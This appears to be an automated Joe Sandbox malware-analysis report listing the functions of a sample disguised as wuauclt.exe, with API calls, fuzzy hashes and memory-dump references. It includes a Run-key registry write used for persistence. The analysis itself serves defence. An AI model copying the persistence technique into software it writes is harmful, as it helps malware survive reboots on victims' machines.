                                                                            • Opcode ID: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction ID: bfa91402dd58f6c0a63bb1b938226b750da621d7fde6486358b4766ab6877618
                                                                            • Opcode Fuzzy Hash: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction Fuzzy Hash: 5C2103716483055FD314CA54C809F7BBBD8EBD8310F488A2CFA959B2C2D779A809C762
                                                                            Function 00402EB0 Relevance: 4.6, APIs: 3, Instructions: 69fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,00000000,?,00402FAB,00406977,00000000,00406C22), ref: 00402F4B
                                                                            • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F6B
                                                                            • GetLastError.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileHandleLast
                                                                            • String ID:
                                                                            • API String ID: 1572049330-0
                                                                            • Opcode ID: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction ID: 8895028cb5cdc15445adb39e81ddeb6a4987250684acebc896c500d1f95e65c5
                                                                            • Opcode Fuzzy Hash: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction Fuzzy Hash: 4A11086120010296E7149F59CA8C71765649F84358F28C37BE8097F3E6D6FCCC85939D
                                                                            Function 00404B70 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            • Opcode ID: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction ID: 2826a8d518f421b74224b4c9e13106b3c01b6d5214c42722886c747e2e10fd3a
                                                                            • Opcode Fuzzy Hash: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction Fuzzy Hash: F801E1B0A04204AFDB40FFA9D84295EBBFCEF48704F5044BAB504F3691DA38DA009628
                                                                            Function 00404C18 Relevance: 4.5, APIs: 3, Instructions: 40registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404BFC: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Close$OpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 1607946009-0
                                                                            • Opcode ID: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction ID: 4b701f08789f1177e28b55cf3da9d2e9372874710ef882e2c23d1ca645a241ff
                                                                            • Opcode Fuzzy Hash: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction Fuzzy Hash: 56F049F160421866D700EB958C81FDE777C9B44354F0041ABBA45F7282D6789F408BE9
                                                                            Function 004012D0 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 004012FF
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001), ref: 00401326
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID: Hh
                                                                            • API String ID: 2087232378-2683877627
                                                                            • Opcode ID: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction ID: d870f39221132c547acdf604606a3f6d37415c35f40f0878f1ff510f596d474e
                                                                            • Opcode Fuzzy Hash: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction Fuzzy Hash: 82F02772B0023067EB20696E0C85B4366D59F49790F14407AFF08FF3E9D6B98C0042A9
                                                                            Function 00404ACC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00404AEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                            • API String ID: 2289755597-1428018034
                                                                            • Opcode ID: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction ID: f4ecd25457bc41be08a6e23874f29c63b64927a4b92a18da8b30fdf3cb70f2a0
                                                                            • Opcode Fuzzy Hash: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction Fuzzy Hash: 39D05EB235C30079E31D96548C43FBA73949794F10F20461EB3A66A1C0DAB07504961D
                                                                            Function 00401EA5 Relevance: 3.1, APIs: 2, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004017B8: RtlInitializeCriticalSection.NTDLL(0040A5B0), ref: 004017CE
                                                                              • Part of subcall function 004017B8: RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004017E1
                                                                              • Part of subcall function 004017B8: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0040186E,?,?,00402052), ref: 0040180B
                                                                              • Part of subcall function 004017B8: RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401868
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 00401EEF
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 0040201A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                            • String ID:
                                                                            • API String ID: 2227675388-0
                                                                            • Opcode ID: 32418cc02c7f1d29882404eab4bca1a01f19dee915ec94e5af37ae9c171b391f
                                                                            • Instruction ID: 7ab3c8591ec623e826adcf2655e4b272feddf0c7b2dc2105d49059c53a0b74ec
                                                                            • Opcode Fuzzy Hash: 32418cc02c7f1d29882404eab4bca1a01f19dee915ec94e5af37ae9c171b391f
                                                                            • Instruction Fuzzy Hash: 2141CDB1A003019FD714CF28DE81A2A77B0FB48318B19827FD445A73F1E7399891CB49
                                                                            Function 004013AC Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401410
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID: Hh
                                                                            • API String ID: 1263568516-2683877627
                                                                            • Opcode ID: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction ID: 1e9abf7fae11d483954ba497bcecb7b42a35322519b3fee74413ce08071db684
                                                                            • Opcode Fuzzy Hash: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction Fuzzy Hash: CC21F970608711AFD710DF19D88065BBBE4EF85720F14C92AE4989B3A1D378EC41CB5A
                                                                            Function 00402AFC Relevance: 3.1, APIs: 2, Instructions: 60fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction ID: a1f473cf3bc07306b130f529efb15ea380eb81567c08e13a342af83bccae4885
                                                                            • Opcode Fuzzy Hash: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction Fuzzy Hash: E611FE71A00109EFDB40DF69CA45A9EB7F8EF58350B108477E808EB2C0E6B4EE009765
                                                                            Function 004014F8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,?,00003FFF,0040175F), ref: 00401552
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID: Hh
                                                                            • API String ID: 1263568516-2683877627
                                                                            • Opcode ID: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction ID: 909510ce892baa7c9b48256ed29b6e7cd33d2823f62f9fa2e1c19f749eef1782
                                                                            • Opcode Fuzzy Hash: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction Fuzzy Hash: 7C01F7726443146FC310DE28DCC092A77A4EBC5364F15053EDA86AB3A1E63AAC0187A9
                                                                            Function 00404AF8 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404ACC: RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            • Opcode ID: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction ID: da0817da91744ea337fddb203b8369e77bf46fb650e87780acf5a1fbdeaccc1d
                                                                            • Opcode Fuzzy Hash: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction Fuzzy Hash: B5F068B06042087FD711AFA59C92E9EBBBCEB85718F5040BEB604B32D1DA786E11855C
                                                                            Function 00402AFA Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction ID: c6e1b1fb9c3516b3f16996619766862c98deb96cc2c348e4269c8597c4437c2e
                                                                            • Opcode Fuzzy Hash: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction Fuzzy Hash: 1EF03071604118BFD704DEAADE89E6BB7ECDF54350B104477F508EB281E6B4ED009674
                                                                            Function 00402820 Relevance: 3.0, APIs: 2, Instructions: 29fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040283F
                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00402848
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            • Opcode ID: a18c08dad6413d25b3ba872c265d0c30b30c6181a290bc4e54c623ff49f761cb
                                                                            • Instruction ID: 4855b5fc16def7a8e97b1a7a6336b917eadaa4f84f3b808a2882fe3178674162
                                                                            • Opcode Fuzzy Hash: a18c08dad6413d25b3ba872c265d0c30b30c6181a290bc4e54c623ff49f761cb
                                                                            • Instruction Fuzzy Hash: 20E092766141206BDB50EE764A84B6323CCAF48390B00C17BBA08EB285E274D8014775
                                                                            Function 00402FAC Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00402C69,?,00000000,00000000,?,00406987,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402590
                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000,0040699C,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402FC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 34b804e8a8bd3546deaa8e8b36638855b6cfa5412d91ad7fb084b2808c24436a
                                                                            • Instruction ID: 4a6b08c2b722228e21e0a8b4d92f73f88c53a7eb371671c656a79b332b0462ea
                                                                            • Opcode Fuzzy Hash: 34b804e8a8bd3546deaa8e8b36638855b6cfa5412d91ad7fb084b2808c24436a
                                                                            • Instruction Fuzzy Hash: 79D05B201041016FE72067358A2A73D7595E744784FE44477F449F96E1E5FDCC85911D
                                                                            Function 00439D46 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,00000437,00000000,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439E09
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction ID: 59c6dd2a180df94c7d145a0c1afdd1ca961f3c5420aeb78bf2f24ad8b18ccf6d
                                                                            • Opcode Fuzzy Hash: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction Fuzzy Hash: 08516E72A042068FC724CF18C881A5BB3E5BF88710F19892EEC59DB355DB75ED06CB95
                                                                            Function 00438524 Relevance: 1.6, APIs: 1, Instructions: 75libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,0043844C), ref: 00438565
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
